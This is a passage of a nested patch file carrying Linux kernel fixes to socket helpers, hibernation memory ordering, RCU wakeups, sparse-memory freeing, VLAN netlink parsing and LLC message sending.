+-	return sk->sk_type == SOCK_DGRAM &&
+-	       sk->sk_protocol == IPPROTO_UDP;
+-}
+-
+ #if IS_ENABLED(CONFIG_NET_SOCK_MSG)
+ 
+ #define BPF_F_STRPARSER	(1UL << 1)
+diff --git a/include/linux/syscalls.h b/include/linux/syscalls.h
+index a34b0f9a9972e..27a6ba1c0ec4e 100644
+--- a/include/linux/syscalls.h
++++ b/include/linux/syscalls.h
+@@ -123,6 +123,7 @@ enum landlock_rule_type;
+ #define __TYPE_IS_LL(t) (__TYPE_AS(t, 0LL) || __TYPE_AS(t, 0ULL))
+ #define __SC_LONG(t, a) __typeof(__builtin_choose_expr(__TYPE_IS_LL(t), 0LL, 0L)) a
+ #define __SC_CAST(t, a)	(__force t) a
++#define __SC_TYPE(t, a)	t
+ #define __SC_ARGS(t, a)	a
+ #define __SC_TEST(t, a) (void)BUILD_BUG_ON_ZERO(!__TYPE_IS_LL(t) && sizeof(t) > sizeof(long))
+ 
+diff --git a/include/net/inet_connection_sock.h b/include/net/inet_connection_sock.h
+index c2b15f7e55161..080968d6e6c53 100644
+--- a/include/net/inet_connection_sock.h
++++ b/include/net/inet_connection_sock.h
+@@ -346,4 +346,12 @@ static inline bool inet_csk_has_ulp(struct sock *sk)
+ 	return inet_sk(sk)->is_icsk && !!inet_csk(sk)->icsk_ulp_ops;
+ }
+ 
++static inline void inet_init_csk_locks(struct sock *sk)
++{
++	struct inet_connection_sock *icsk = inet_csk(sk);
++
++	spin_lock_init(&icsk->icsk_accept_queue.rskq_lock);
++	spin_lock_init(&icsk->icsk_accept_queue.fastopenq.lock);
++}
++
+ #endif /* _INET_CONNECTION_SOCK_H */
+diff --git a/include/net/inet_sock.h b/include/net/inet_sock.h
+index c2432c2addc82..c98890e21401c 100644
+--- a/include/net/inet_sock.h
++++ b/include/net/inet_sock.h
+@@ -270,11 +270,6 @@ struct inet_sock {
+ #define IP_CMSG_CHECKSUM	BIT(7)
+ #define IP_CMSG_RECVFRAGSIZE	BIT(8)
+ 
+-static inline bool sk_is_inet(struct sock *sk)
+-{
+-	return sk->sk_family == AF_INET || sk->sk_family == AF_INET6;
+-}
+-
+ /**
+  * sk_to_full_sk - Access to a full socket
+  * @sk: pointer to a socket
+diff --git a/include/net/llc_pdu.h b/include/net/llc_pdu.h
+index 49aa79c7b278a..581cd37aa98b7 100644
+--- a/include/net/llc_pdu.h
++++ b/include/net/llc_pdu.h
+@@ -262,8 +262,7 @@ static inline void llc_pdu_header_init(struct sk_buff *skb, u8 type,
+  */
+ static inline void llc_pdu_decode_sa(struct sk_buff *skb, u8 *sa)
+ {
+-	if (skb->protocol == htons(ETH_P_802_2))
+-		memcpy(sa, eth_hdr(skb)->h_source, ETH_ALEN);
++	memcpy(sa, eth_hdr(skb)->h_source, ETH_ALEN);
+ }
+ 
+ /**
+@@ -275,8 +274,7 @@ static inline void llc_pdu_decode_sa(struct sk_buff *skb, u8 *sa)
+  */
+ static inline void llc_pdu_decode_da(struct sk_buff *skb, u8 *da)
+ {
+-	if (skb->protocol == htons(ETH_P_802_2))
+-		memcpy(da, eth_hdr(skb)->h_dest, ETH_ALEN);
++	memcpy(da, eth_hdr(skb)->h_dest, ETH_ALEN);
+ }
+ 
+ /**
+diff --git a/include/net/sock.h b/include/net/sock.h
+index 6b51e85ae69e3..579732d47dfc4 100644
+--- a/include/net/sock.h
++++ b/include/net/sock.h
+@@ -2824,9 +2824,25 @@ static inline void skb_setup_tx_timestamp(struct sk_buff *skb, __u16 tsflags)
+ 			   &skb_shinfo(skb)->tskey);
+ }
+ 
++static inline bool sk_is_inet(const struct sock *sk)
++{
++	int family = READ_ONCE(sk->sk_family);
++
++	return family == AF_INET || family == AF_INET6;
++}
++
+ static inline bool sk_is_tcp(const struct sock *sk)
+ {
+-	return sk->sk_type == SOCK_STREAM && sk->sk_protocol == IPPROTO_TCP;
++	return sk_is_inet(sk) &&
++	       sk->sk_type == SOCK_STREAM &&
++	       sk->sk_protocol == IPPROTO_TCP;
++}
++
++static inline bool sk_is_udp(const struct sock *sk)
++{
++	return sk_is_inet(sk) &&
++	       sk->sk_type == SOCK_DGRAM &&
++	       sk->sk_protocol == IPPROTO_UDP;
+ }
+ 
+ static inline bool sk_is_stream_unix(const struct sock *sk)
+diff --git a/include/uapi/linux/btrfs.h b/include/uapi/linux/btrfs.h
+index d4d4fa0bb362e..24b54635bae90 100644
+--- a/include/uapi/linux/btrfs.h
++++ b/include/uapi/linux/btrfs.h
+@@ -585,6 +585,9 @@ struct btrfs_ioctl_clone_range_args {
+  */
+ #define BTRFS_DEFRAG_RANGE_COMPRESS 1
+ #define BTRFS_DEFRAG_RANGE_START_IO 2
++#define BTRFS_DEFRAG_RANGE_FLAGS_SUPP	(BTRFS_DEFRAG_RANGE_COMPRESS |		\
++					 BTRFS_DEFRAG_RANGE_START_IO)
++
+ struct btrfs_ioctl_defrag_range_args {
+ 	/* start of the defrag operation */
+ 	__u64 start;
+diff --git a/kernel/async.c b/kernel/async.c
+index b2c4ba5686ee4..673bba6bdf3a0 100644
+--- a/kernel/async.c
++++ b/kernel/async.c
+@@ -145,6 +145,39 @@ static void async_run_entry_fn(struct work_struct *work)
+ 	wake_up(&async_done);
+ }
+ 
++static async_cookie_t __async_schedule_node_domain(async_func_t func,
++						   void *data, int node,
++						   struct async_domain *domain,
++						   struct async_entry *entry)
++{
++	async_cookie_t newcookie;
++	unsigned long flags;
++
++	INIT_LIST_HEAD(&entry->domain_list);
++	INIT_LIST_HEAD(&entry->global_list);
++	INIT_WORK(&entry->work, async_run_entry_fn);
++	entry->func = func;
++	entry->data = data;
++	entry->domain = domain;
++
++	spin_lock_irqsave(&async_lock, flags);
++
++	/* allocate cookie and queue */
++	newcookie = entry->cookie = next_cookie++;
++
++	list_add_tail(&entry->domain_list, &domain->pending);
++	if (domain->registered)
++		list_add_tail(&entry->global_list, &async_global_pending);
++
++	atomic_inc(&entry_count);
++	spin_unlock_irqrestore(&async_lock, flags);
++
++	/* schedule for execution */
++	queue_work_node(node, system_unbound_wq, &entry->work);
++
++	return newcookie;
++}
++
+ /**
+  * async_schedule_node_domain - NUMA specific version of async_schedule_domain
+  * @func: function to execute asynchronously
+@@ -186,29 +219,8 @@ async_cookie_t async_schedule_node_domain(async_func_t func, void *data,
+ 		func(data, newcookie);
+ 		return newcookie;
+ 	}
+-	INIT_LIST_HEAD(&entry->domain_list);
+-	INIT_LIST_HEAD(&entry->global_list);
+-	INIT_WORK(&entry->work, async_run_entry_fn);
+-	entry->func = func;
+-	entry->data = data;
+-	entry->domain = domain;
+-
+-	spin_lock_irqsave(&async_lock, flags);
+-
+-	/* allocate cookie and queue */
+-	newcookie = entry->cookie = next_cookie++;
+-
+-	list_add_tail(&entry->domain_list, &domain->pending);
+-	if (domain->registered)
+-		list_add_tail(&entry->global_list, &async_global_pending);
+-
+-	atomic_inc(&entry_count);
+-	spin_unlock_irqrestore(&async_lock, flags);
+-
+-	/* schedule for execution */
+-	queue_work_node(node, system_unbound_wq, &entry->work);
+ 
+-	return newcookie;
++	return __async_schedule_node_domain(func, data, node, domain, entry);
+ }
+ EXPORT_SYMBOL_GPL(async_schedule_node_domain);
+ 
+@@ -231,6 +243,35 @@ async_cookie_t async_schedule_node(async_func_t func, void *data, int node)
+ }
+ EXPORT_SYMBOL_GPL(async_schedule_node);
+ 
++/**
++ * async_schedule_dev_nocall - A simplified variant of async_schedule_dev()
++ * @func: function to execute asynchronously
++ * @dev: device argument to be passed to function
++ *
++ * @dev is used as both the argument for the function and to provide NUMA
++ * context for where to run the function.
++ *
++ * If the asynchronous execution of @func is scheduled successfully, return
++ * true. Otherwise, do nothing and return false, unlike async_schedule_dev()
++ * that will run the function synchronously then.
++ */
++bool async_schedule_dev_nocall(async_func_t func, struct device *dev)
++{
++	struct async_entry *entry;
++
++	entry = kzalloc(sizeof(struct async_entry), GFP_KERNEL);
++
++	/* Give up if there is no memory or too much work. */
++	if (!entry || atomic_read(&entry_count) > MAX_WORK) {
++		kfree(entry);
++		return false;
++	}
++
++	__async_schedule_node_domain(func, dev, dev_to_node(dev),
++				     &async_dfl_domain, entry);
++	return true;
++}
++
+ /**
+  * async_synchronize_full - synchronize all asynchronous function calls
+  *
+diff --git a/kernel/power/swap.c b/kernel/power/swap.c
+index cc44c37699de6..5ab54ab5ace7c 100644
+--- a/kernel/power/swap.c
++++ b/kernel/power/swap.c
+@@ -605,11 +605,11 @@ static int crc32_threadfn(void *data)
+ 	unsigned i;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -618,7 +618,7 @@ static int crc32_threadfn(void *data)
+ 		for (i = 0; i < d->run_threads; i++)
+ 			*d->crc32 = crc32_le(*d->crc32,
+ 			                     d->unc[i], *d->unc_len[i]);
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -648,12 +648,12 @@ static int lzo_compress_threadfn(void *data)
+ 	struct cmp_data *d = data;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+ 			d->ret = -1;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -662,7 +662,7 @@ static int lzo_compress_threadfn(void *data)
+ 		d->ret = lzo1x_1_compress(d->unc, d->unc_len,
+ 		                          d->cmp + LZO_HEADER, &d->cmp_len,
+ 		                          d->wrk);
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -797,7 +797,7 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 
+ 			data[thr].unc_len = off;
+ 
+-			atomic_set(&data[thr].ready, 1);
++			atomic_set_release(&data[thr].ready, 1);
+ 			wake_up(&data[thr].go);
+ 		}
+ 
+@@ -805,12 +805,12 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 			break;
+ 
+ 		crc->run_threads = thr;
+-		atomic_set(&crc->ready, 1);
++		atomic_set_release(&crc->ready, 1);
+ 		wake_up(&crc->go);
+ 
+ 		for (run_threads = thr, thr = 0; thr < run_threads; thr++) {
+ 			wait_event(data[thr].done,
+-			           atomic_read(&data[thr].stop));
++				atomic_read_acquire(&data[thr].stop));
+ 			atomic_set(&data[thr].stop, 0);
+ 
+ 			ret = data[thr].ret;
+@@ -849,7 +849,7 @@ static int save_image_lzo(struct swap_map_handle *handle,
+ 			}
+ 		}
+ 
+-		wait_event(crc->done, atomic_read(&crc->stop));
++		wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 		atomic_set(&crc->stop, 0);
+ 	}
+ 
+@@ -1131,12 +1131,12 @@ static int lzo_decompress_threadfn(void *data)
+ 	struct dec_data *d = data;
+ 
+ 	while (1) {
+-		wait_event(d->go, atomic_read(&d->ready) ||
++		wait_event(d->go, atomic_read_acquire(&d->ready) ||
+ 		                  kthread_should_stop());
+ 		if (kthread_should_stop()) {
+ 			d->thr = NULL;
+ 			d->ret = -1;
+-			atomic_set(&d->stop, 1);
++			atomic_set_release(&d->stop, 1);
+ 			wake_up(&d->done);
+ 			break;
+ 		}
+@@ -1149,7 +1149,7 @@ static int lzo_decompress_threadfn(void *data)
+ 			flush_icache_range((unsigned long)d->unc,
+ 					   (unsigned long)d->unc + d->unc_len);
+ 
+-		atomic_set(&d->stop, 1);
++		atomic_set_release(&d->stop, 1);
+ 		wake_up(&d->done);
+ 	}
+ 	return 0;
+@@ -1334,7 +1334,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 		}
+ 
+ 		if (crc->run_threads) {
+-			wait_event(crc->done, atomic_read(&crc->stop));
++			wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 			atomic_set(&crc->stop, 0);
+ 			crc->run_threads = 0;
+ 		}
+@@ -1370,7 +1370,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 					pg = 0;
+ 			}
+ 
+-			atomic_set(&data[thr].ready, 1);
++			atomic_set_release(&data[thr].ready, 1);
+ 			wake_up(&data[thr].go);
+ 		}
+ 
+@@ -1389,7 +1389,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 
+ 		for (run_threads = thr, thr = 0; thr < run_threads; thr++) {
+ 			wait_event(data[thr].done,
+-			           atomic_read(&data[thr].stop));
++				atomic_read_acquire(&data[thr].stop));
+ 			atomic_set(&data[thr].stop, 0);
+ 
+ 			ret = data[thr].ret;
+@@ -1420,7 +1420,7 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 				ret = snapshot_write_next(snapshot);
+ 				if (ret <= 0) {
+ 					crc->run_threads = thr + 1;
+-					atomic_set(&crc->ready, 1);
++					atomic_set_release(&crc->ready, 1);
+ 					wake_up(&crc->go);
+ 					goto out_finish;
+ 				}
+@@ -1428,13 +1428,13 @@ static int load_image_lzo(struct swap_map_handle *handle,
+ 		}
+ 
+ 		crc->run_threads = thr;
+-		atomic_set(&crc->ready, 1);
++		atomic_set_release(&crc->ready, 1);
+ 		wake_up(&crc->go);
+ 	}
+ 
+ out_finish:
+ 	if (crc->run_threads) {
+-		wait_event(crc->done, atomic_read(&crc->stop));
++		wait_event(crc->done, atomic_read_acquire(&crc->stop));
+ 		atomic_set(&crc->stop, 0);
+ 	}
+ 	stop = ktime_get();
+diff --git a/kernel/rcu/tree.c b/kernel/rcu/tree.c
+index 15df37bc052a9..9d7464a90f85d 100644
+--- a/kernel/rcu/tree.c
++++ b/kernel/rcu/tree.c
+@@ -1051,6 +1051,38 @@ static bool rcu_future_gp_cleanup(struct rcu_node *rnp)
+ 	return needmore;
+ }
+ 
++static void swake_up_one_online_ipi(void *arg)
++{
++	struct swait_queue_head *wqh = arg;
++
++	swake_up_one(wqh);
++}
++
++static void swake_up_one_online(struct swait_queue_head *wqh)
++{
++	int cpu = get_cpu();
++
++	/*
++	 * If called from rcutree_report_cpu_starting(), wake up
++	 * is dangerous that late in the CPU-down hotplug process. The
++	 * scheduler might queue an ignored hrtimer. Defer the wake up
++	 * to an online CPU instead.
++	 */
++	if (unlikely(cpu_is_offline(cpu))) {
++		int target;
++
++		target = cpumask_any_and(housekeeping_cpumask(HK_TYPE_RCU),
++					 cpu_online_mask);
++
++		smp_call_function_single(target, swake_up_one_online_ipi,
++					 wqh, 0);
++		put_cpu();
++	} else {
++		put_cpu();
++		swake_up_one(wqh);
++	}
++}
++
+ /*
+  * Awaken the grace-period kthread.  Don't do a self-awaken (unless in an
+  * interrupt or softirq handler, in which case we just might immediately
+@@ -1075,7 +1107,7 @@ static void rcu_gp_kthread_wake(void)
+ 		return;
+ 	WRITE_ONCE(rcu_state.gp_wake_time, jiffies);
+ 	WRITE_ONCE(rcu_state.gp_wake_seq, READ_ONCE(rcu_state.gp_seq));
+-	swake_up_one(&rcu_state.gp_wq);
++	swake_up_one_online(&rcu_state.gp_wq);
+ }
+ 
+ /*
+diff --git a/kernel/rcu/tree_exp.h b/kernel/rcu/tree_exp.h
+index aa3ec3c3b9f75..6d2cbed96b462 100644
+--- a/kernel/rcu/tree_exp.h
++++ b/kernel/rcu/tree_exp.h
+@@ -172,7 +172,6 @@ static bool sync_rcu_exp_done_unlocked(struct rcu_node *rnp)
+ 	return ret;
+ }
+ 
+-
+ /*
+  * Report the exit from RCU read-side critical section for the last task
+  * that queued itself during or before the current expedited preemptible-RCU
+@@ -200,7 +199,7 @@ static void __rcu_report_exp_rnp(struct rcu_node *rnp,
+ 			raw_spin_unlock_irqrestore_rcu_node(rnp, flags);
+ 			if (wake) {
+ 				smp_mb(); /* EGP done before wake_up(). */
+-				swake_up_one(&rcu_state.expedited_wq);
++				swake_up_one_online(&rcu_state.expedited_wq);
+ 			}
+ 			break;
+ 		}
+diff --git a/kernel/time/tick-sched.c b/kernel/time/tick-sched.c
+index 1a5d02224d465..8cfdc6b978d76 100644
+--- a/kernel/time/tick-sched.c
++++ b/kernel/time/tick-sched.c
+@@ -1557,6 +1557,7 @@ void tick_cancel_sched_timer(int cpu)
+ {
+ 	struct tick_sched *ts = &per_cpu(tick_cpu_sched, cpu);
+ 	ktime_t idle_sleeptime, iowait_sleeptime;
++	unsigned long idle_calls, idle_sleeps;
+ 
+ # ifdef CONFIG_HIGH_RES_TIMERS
+ 	if (ts->sched_timer.base)
+@@ -1565,9 +1566,13 @@ void tick_cancel_sched_timer(int cpu)
+ 
+ 	idle_sleeptime = ts->idle_sleeptime;
+ 	iowait_sleeptime = ts->iowait_sleeptime;
++	idle_calls = ts->idle_calls;
++	idle_sleeps = ts->idle_sleeps;
+ 	memset(ts, 0, sizeof(*ts));
+ 	ts->idle_sleeptime = idle_sleeptime;
+ 	ts->iowait_sleeptime = iowait_sleeptime;
++	ts->idle_calls = idle_calls;
++	ts->idle_sleeps = idle_sleeps;
+ }
+ #endif
+ 
+diff --git a/kernel/trace/tracing_map.c b/kernel/trace/tracing_map.c
+index c774e560f2f95..a4dcf0f243521 100644
+--- a/kernel/trace/tracing_map.c
++++ b/kernel/trace/tracing_map.c
+@@ -574,7 +574,12 @@ __tracing_map_insert(struct tracing_map *map, void *key, bool lookup_only)
+ 				}
+ 
+ 				memcpy(elt->key, key, map->key_size);
+-				entry->val = elt;
++				/*
++				 * Ensure the initialization is visible and
++				 * publish the elt.
++				 */
++				smp_wmb();
++				WRITE_ONCE(entry->val, elt);
+ 				atomic64_inc(&map->hits);
+ 
+ 				return entry->val;
+diff --git a/mm/page_alloc.c b/mm/page_alloc.c
+index 4583f8a42d914..c783806eefc9f 100644
+--- a/mm/page_alloc.c
++++ b/mm/page_alloc.c
+@@ -4921,14 +4921,9 @@ should_reclaim_retry(gfp_t gfp_mask, unsigned order,
+ 	else
+ 		(*no_progress_loops)++;
+ 
+-	/*
+-	 * Make sure we converge to OOM if we cannot make any progress
+-	 * several times in the row.
+-	 */
+-	if (*no_progress_loops > MAX_RECLAIM_RETRIES) {
+-		/* Before OOM, exhaust highatomic_reserve */
+-		return unreserve_highatomic_pageblock(ac, true);
+-	}
++	if (*no_progress_loops > MAX_RECLAIM_RETRIES)
++		goto out;
++
+ 
+ 	/*
+ 	 * Keep reclaiming pages while there is a chance this will lead
+@@ -4971,6 +4966,11 @@ should_reclaim_retry(gfp_t gfp_mask, unsigned order,
+ 		schedule_timeout_uninterruptible(1);
+ 	else
+ 		cond_resched();
++out:
++	/* Before OOM, exhaust highatomic_reserve */
++	if (!ret)
++		return unreserve_highatomic_pageblock(ac, true);
++
+ 	return ret;
+ }
+ 
+diff --git a/mm/sparse.c b/mm/sparse.c
+index e5a8a3a0edd74..05d1e7b6c6dba 100644
+--- a/mm/sparse.c
++++ b/mm/sparse.c
+@@ -792,6 +792,13 @@ static void section_deactivate(unsigned long pfn, unsigned long nr_pages,
+ 	if (empty) {
+ 		unsigned long section_nr = pfn_to_section_nr(pfn);
+ 
++		/*
++		 * Mark the section invalid so that valid_section()
++		 * return false. This prevents code from dereferencing
++		 * ms->usage array.
++		 */
++		ms->section_mem_map &= ~SECTION_HAS_MEM_MAP;
++
+ 		/*
+ 		 * When removing an early section, the usage map is kept (as the
+ 		 * usage maps of other sections fall into the same page). It
+@@ -800,16 +807,10 @@ static void section_deactivate(unsigned long pfn, unsigned long nr_pages,
+ 		 * was allocated during boot.
+ 		 */
+ 		if (!PageReserved(virt_to_page(ms->usage))) {
+-			kfree(ms->usage);
+-			ms->usage = NULL;
++			kfree_rcu(ms->usage, rcu);
++			WRITE_ONCE(ms->usage, NULL);
+ 		}
+ 		memmap = sparse_decode_mem_map(ms->section_mem_map, section_nr);
+-		/*
+-		 * Mark the section invalid so that valid_section()
+-		 * return false. This prevents code from dereferencing
+-		 * ms->usage array.
+-		 */
+-		ms->section_mem_map &= ~SECTION_HAS_MEM_MAP;
+ 	}
+ 
+ 	/*
+diff --git a/net/8021q/vlan_netlink.c b/net/8021q/vlan_netlink.c
+index 214532173536b..a3b68243fd4b1 100644
+--- a/net/8021q/vlan_netlink.c
++++ b/net/8021q/vlan_netlink.c
+@@ -118,12 +118,16 @@ static int vlan_changelink(struct net_device *dev, struct nlattr *tb[],
+ 	}
+ 	if (data[IFLA_VLAN_INGRESS_QOS]) {
+ 		nla_for_each_nested(attr, data[IFLA_VLAN_INGRESS_QOS], rem) {
++			if (nla_type(attr) != IFLA_VLAN_QOS_MAPPING)
++				continue;
+ 			m = nla_data(attr);
+ 			vlan_dev_set_ingress_priority(dev, m->to, m->from);
+ 		}
+ 	}
+ 	if (data[IFLA_VLAN_EGRESS_QOS]) {
+ 		nla_for_each_nested(attr, data[IFLA_VLAN_EGRESS_QOS], rem) {
++			if (nla_type(attr) != IFLA_VLAN_QOS_MAPPING)
++				continue;
+ 			m = nla_data(attr);
+ 			err = vlan_dev_set_egress_priority(dev, m->from, m->to);
+ 			if (err)
+diff --git a/net/core/dev.c b/net/core/dev.c
+index 0a5566b6f8a25..1ba3662faf0aa 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -11323,6 +11323,7 @@ static struct pernet_operations __net_initdata netdev_net_ops = {
+ 
+ static void __net_exit default_device_exit_net(struct net *net)
+ {
++	struct netdev_name_node *name_node, *tmp;
+ 	struct net_device *dev, *aux;
+ 	/*
+ 	 * Push all migratable network devices back to the
+@@ -11345,6 +11346,14 @@ static void __net_exit default_device_exit_net(struct net *net)
+ 		snprintf(fb_name, IFNAMSIZ, "dev%d", dev->ifindex);
+ 		if (netdev_name_in_use(&init_net, fb_name))
+ 			snprintf(fb_name, IFNAMSIZ, "dev%%d");
++
++		netdev_for_each_altname_safe(dev, name_node, tmp)
++			if (netdev_name_in_use(&init_net, name_node->name)) {
++				netdev_name_node_del(name_node);
++				synchronize_rcu();
++				__netdev_name_node_alt_destroy(name_node);
++			}
++
+ 		err = dev_change_net_namespace(dev, &init_net, fb_name);
+ 		if (err) {
+ 			pr_emerg("%s: failed to move %s to init_net: %d\n",
+diff --git a/net/core/dev.h b/net/core/dev.h
+index 9ca91457c197e..db9ff8cd8d46d 100644
+--- a/net/core/dev.h
++++ b/net/core/dev.h
+@@ -63,6 +63,9 @@ int dev_change_name(struct net_device *dev, const char *newname);
+ 
+ #define netdev_for_each_altname(dev, namenode)				\
+ 	list_for_each_entry((namenode), &(dev)->name_node->list, list)
++#define netdev_for_each_altname_safe(dev, namenode, next)		\
++	list_for_each_entry_safe((namenode), (next), &(dev)->name_node->list, \
++				 list)
+ 
+ int netdev_name_node_alt_create(struct net_device *dev, const char *name);
+ int netdev_name_node_alt_destroy(struct net_device *dev, const char *name);
+diff --git a/net/core/request_sock.c b/net/core/request_sock.c
+index f35c2e9984062..63de5c635842b 100644
+--- a/net/core/request_sock.c
++++ b/net/core/request_sock.c
+@@ -33,9 +33,6 @@
+ 
+ void reqsk_queue_alloc(struct request_sock_queue *queue)
+ {
+-	spin_lock_init(&queue->rskq_lock);
+-
+-	spin_lock_init(&queue->fastopenq.lock);
+ 	queue->fastopenq.rskq_rst_head = NULL;
+ 	queue->fastopenq.rskq_rst_tail = NULL;
+ 	queue->fastopenq.qlen = 0;
+diff --git a/net/core/sock.c b/net/core/sock.c
+index c50a14a02edd4..c8803b95ea0da 100644
+--- a/net/core/sock.c
++++ b/net/core/sock.c
+@@ -107,6 +107,7 @@
+ #include <linux/interrupt.h>
+ #include <linux/poll.h>
+ #include <linux/tcp.h>
++#include <linux/udp.h>
+ #include <linux/init.h>
+ #include <linux/highmem.h>
+ #include <linux/user_namespace.h>
+@@ -4109,8 +4110,14 @@ bool sk_busy_loop_end(void *p, unsigned long start_time)
+ {
+ 	struct sock *sk = p;
+ 
+-	return !skb_queue_empty_lockless(&sk->sk_receive_queue) ||
+-	       sk_busy_loop_timeout(sk, start_time);
++	if (!skb_queue_empty_lockless(&sk->sk_receive_queue))
++		return true;
++
++	if (sk_is_udp(sk) &&
++	    !skb_queue_empty_lockless(&udp_sk(sk)->reader_queue))
++		return true;
++
++	return sk_busy_loop_timeout(sk, start_time);
+ }
+ EXPORT_SYMBOL(sk_busy_loop_end);
+ #endif /* CONFIG_NET_RX_BUSY_POLL */
+diff --git a/net/ipv4/af_inet.c b/net/ipv4/af_inet.c
+index c13b8ed63f87e..2f646335d2183 100644
+--- a/net/ipv4/af_inet.c
++++ b/net/ipv4/af_inet.c
+@@ -324,6 +324,9 @@ lookup_protocol:
+ 	if (INET_PROTOSW_REUSE & answer_flags)
+ 		sk->sk_reuse = SK_CAN_REUSE;
+ 
++	if (INET_PROTOSW_ICSK & answer_flags)
++		inet_init_csk_locks(sk);
++
+ 	inet = inet_sk(sk);
+ 	inet->is_icsk = (INET_PROTOSW_ICSK & answer_flags) != 0;
+ 
+diff --git a/net/ipv4/inet_connection_sock.c b/net/ipv4/inet_connection_sock.c
+index 80ce0112e24b4..79fa19a36bbd1 100644
+--- a/net/ipv4/inet_connection_sock.c
++++ b/net/ipv4/inet_connection_sock.c
+@@ -727,6 +727,10 @@ out:
+ 	}
+ 	if (req)
+ 		reqsk_put(req);
++
++	if (newsk)
++		inet_init_csk_locks(newsk);
++
+ 	return newsk;
+ out_err:
+ 	newsk = NULL;
+diff --git a/net/ipv4/tcp.c b/net/ipv4/tcp.c
+index 0b7844a8d5711..90e24c3f65570 100644
+--- a/net/ipv4/tcp.c
++++ b/net/ipv4/tcp.c
+@@ -718,6 +718,7 @@ void tcp_push(struct sock *sk, int flags, int mss_now,
+ 		if (!test_bit(TSQ_THROTTLED, &sk->sk_tsq_flags)) {
+ 			NET_INC_STATS(sock_net(sk), LINUX_MIB_TCPAUTOCORKING);
+ 			set_bit(TSQ_THROTTLED, &sk->sk_tsq_flags);
++			smp_mb__after_atomic();
+ 		}
+ 		/* It is possible TX completion already happened
+ 		 * before we set TSQ_THROTTLED.
+diff --git a/net/ipv6/af_inet6.c b/net/ipv6/af_inet6.c
+index a2f29ca516000..0b42eb8c55aaf 100644
+--- a/net/ipv6/af_inet6.c
++++ b/net/ipv6/af_inet6.c
+@@ -199,6 +199,9 @@ lookup_protocol:
+ 	if (INET_PROTOSW_REUSE & answer_flags)
+ 		sk->sk_reuse = SK_CAN_REUSE;
+ 
++	if (INET_PROTOSW_ICSK & answer_flags)
++		inet_init_csk_locks(sk);
++
+ 	inet = inet_sk(sk);
+ 	inet->is_icsk = (INET_PROTOSW_ICSK & answer_flags) != 0;
+ 
+diff --git a/net/llc/af_llc.c b/net/llc/af_llc.c
+index 9ffbc667be6cf..19c478bd85bd8 100644
+--- a/net/llc/af_llc.c
++++ b/net/llc/af_llc.c
+@@ -928,14 +928,15 @@ copy_uaddr:
+  */
+ static int llc_ui_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ {
++	DECLARE_SOCKADDR(struct sockaddr_llc *, addr, msg->msg_name);
+ 	struct sock *sk = sock->sk;
+ 	struct llc_sock *llc = llc_sk(sk);
+-	DECLARE_SOCKADDR(struct sockaddr_llc *, addr, msg->msg_name);
+ 	int flags = msg->msg_flags;
+ 	int noblock = flags & MSG_DONTWAIT;
++	int rc = -EINVAL, copied = 0, hdrlen, hh_len;
+ 	struct sk_buff *skb = NULL;
++	struct net_device *dev;
+ 	size_t size = 0;
+-	int rc = -EINVAL, copied = 0, hdrlen;
+ 
+ 	dprintk("%s: sending from %02X to %02X\n", __func__,
+ 		llc->laddr.lsap, llc->daddr.lsap);
+@@ -955,22 +956,29 @@ static int llc_ui_sendmsg(struct socket *sock, struct msghdr *msg, size_t len)
+ 		if (rc)
+ 			goto out;
+ 	}
+-	hdrlen = llc->dev->hard_header_len + llc_ui_header_len(sk, addr);
++	dev = llc->dev;
++	hh_len = LL_RESERVED_SPACE(dev);
++	hdrlen = llc_ui_header_len(sk, addr);
+ 	size = hdrlen + len;
+-	if (size > llc->dev->mtu)
+-		size = llc->dev->mtu;
++	size = min_t(size_t, size, READ_ONCE(dev->mtu));
+ 	copied = size - hdrlen;
+ 	rc = -EINVAL;
+ 	if (copied < 0)
+ 		goto out;
+ 	release_sock(sk);
+-	skb = sock_alloc_send_skb(sk, size, noblock, &rc);
++	skb = sock_alloc_send_skb(sk, hh_len + size, noblock, &rc);
+ 	lock_sock(sk);
+ 	if (!skb)
+ 		goto out;
+-	skb->dev      = llc->dev;
++	if (sock_flag(sk, SOCK_ZAPPED) ||
++	    llc->dev != dev ||
++	    hdrlen != llc_ui_header_len(sk, addr) ||
++	    hh_len != LL_RESERVED_SPACE(dev) ||
++	    size > READ_ONCE(dev->mtu))
++		goto out;
++	skb->dev      = dev;
+ 	skb->protocol = llc_proto_type(addr->sllc_arphrd);
+-	skb_reserve(skb, hdrlen);
++	skb_reserve(skb, hh_len + hdrlen);
+ 	rc = memcpy_from_msg(skb_put(skb, copied), msg, copied);
+ 	if (rc)
+ 		goto out;
+diff --git a/net/llc/llc_core.c b/net/llc/llc_core.c
+index 6e387aadffcec..4f16d9c88350b 100644
+--- a/net/llc/llc_core.c
++++ b/net/llc/llc_core.c
+@@ -135,22 +135,15 @@ static struct packet_type llc_packet_type __read_mostly = {
+ 	.func = llc_rcv,
+ };
+ 
+-static struct packet_type llc_tr_packet_type __read_mostly = {
+-	.type = cpu_to_be16(ETH_P_TR_802_2),
+-	.func = llc_rcv,
+-};
+-
+ static int __init llc_init(void)
+ {
